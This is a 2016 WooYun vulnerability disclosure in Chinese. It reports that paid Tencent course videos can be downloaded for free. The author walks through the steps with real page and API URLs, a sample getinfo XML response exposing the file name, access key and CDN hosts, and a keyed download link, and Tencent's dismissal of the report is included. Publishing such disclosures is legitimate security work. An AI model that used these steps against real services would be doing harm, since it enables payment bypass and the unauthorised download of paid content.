当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171067

漏洞标题:腾讯精品课程任意下载(含收费)

相关厂商:腾讯

漏洞作者: bill

提交时间:2016-01-19 17:29

修复时间:2016-01-20 11:00

公开时间:2016-01-20 11:00

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-19: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

腾讯精品课程的视频不管免费还是收费可以任意下载

详细说明:

经过几个页面的跳转访问可以获得视频的真实路径

漏洞证明:

这是收费视频
http://class.qq.com/class/12274.html

QQ图片20160119105639.png


取得视频的id是 51251
视频的播放页面是
http://class.qq.com/hclass/12274/v2/p51251.html

QQ图片20160119105639.png


QQ截图20160119110313.png


该段视频的id 为 w1401s9cwc9
因此访问地址 http://tt.video.qq.com/getinfo?vid=w1401s9cwc9
得到一个xml

<root>
<exem>1</exem>
<fl>
<cnt>5</cnt>
<fi>
<br>64</br>
<id>1</id>
<lmt>0</lmt>
<name>flv</name>
<sb>1</sb>
<sl>0</sl>
</fi>
<fi>
<br>64</br>
<id>2</id>
<lmt>0</lmt>
<name>mp4</name>
<sb>1</sb>
<sl>1</sl>
</fi>
<fi>
<br>1500</br>
<id>10701</id>
<lmt>0</lmt>
<name>shd</name>
<sb>1</sb>
<sl>0</sl>
</fi>
<fi>
<br>500</br>
<id>10702</id>
<lmt>0</lmt>
<name>hd</name>
<sb>1</sb>
<sl>0</sl>
</fi>
<fi>
<br>64</br>
<id>10703</id>
<lmt>0</lmt>
<name>sd</name>
<sb>1</sb>
<sl>0</sl>
</fi>
</fl>
<hs>0</hs>
<ls>0</ls>
<preview>15</preview>
<s>o</s>
<sfl>
<cnt>0</cnt>
</sfl>
<tm>1453172682</tm>
<vl>
<cnt>1</cnt>
<vi>
<alias>07e1ca65c1ae1cca3766e7005ef8bb63</alias>
<br>17</br>
<ch>0</ch>
<cl>
<fc>0</fc>
<keyid>w1401s9cwc9.2</keyid>
</cl>
<fclip>0</fclip>
<fmd5>fd12d987f00c048d9915887b99f89f43</fmd5>
<fn>w1401s9cwc9.mp4</fn>
<fs>6004223</fs>
<fst>5</fst>
<fvkey>
C45CF63B5EAAF1F566DEA496553F59C462375E11696B41632842BE72954F64C9B1A4696701368E04FFDD6A58EFB4424B952238F5C135771DB79127406DC81FFF9DE918E61C9C3E314CE37416388CD4FB9A56EB07F828B0EF
</fvkey>
<level>0</level>
<lnk>w1401s9cwc9</lnk>
<logo>1</logo>
<share>1</share>
<sp>0</sp>
<st>2</st>
<td>327</td>
<ti>1做自媒体如何定位mp4</ti>
<type>5122</type>
<ul>
<ui>
<dt>2</dt>
<dtc>0</dtc>
<url>http://42.236.70.155/videoctfs.tc.qq.com/</url>
<vt>301</vt>
</ui>
<ui>
<dt>2</dt>
<dtc>0</dtc>
<url>http://42.236.70.153/videoctfs.tc.qq.com/</url>
<vt>301</vt>
</ui>
<ui>
<dt>2</dt>
<dtc>10</dtc>
<url>http://video.dispatch.tc.qq.com/</url>
<vt>0</vt>
</ui>
</ul>
<vh>352</vh>
<vid>w1401s9cwc9</vid>
<videotype>0</videotype>
<vw>640</vw>
</vi>
</vl>
</root>


其中包含几个有用的节点

QQ截图20160119110703.png


fn视频文件名;fvkey访问密钥 ul 应该是一组cdn加速器
让他访问地址
http://42.236.70.149/videoctfs.tc.qq.com/w1401s9cwc9.mp4?vkey=5BD467A84FE4A0B40DD1A20B4BC3E65868930211F95821ACB4FB06454BC4A62A867C659E00708067ACEED7FE26D78DECF2C29CB51DDFB27D873AD78A176E8CD0FEA661AFBB8EC91C282850C7380F31FA3948961F094ECD21
密钥可能会失效,但是已经可以下载文件了
当你验证的时候请出现获取密钥,
价值299的课程就桌面免费可以看了

修复方案:

版权声明:转载请注明来源 bill@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-20 11:00

厂商回复:

非常感谢您的报告,经评估该问题并不存在,故此忽略。如果您有任何的疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无

漏洞评价:

评价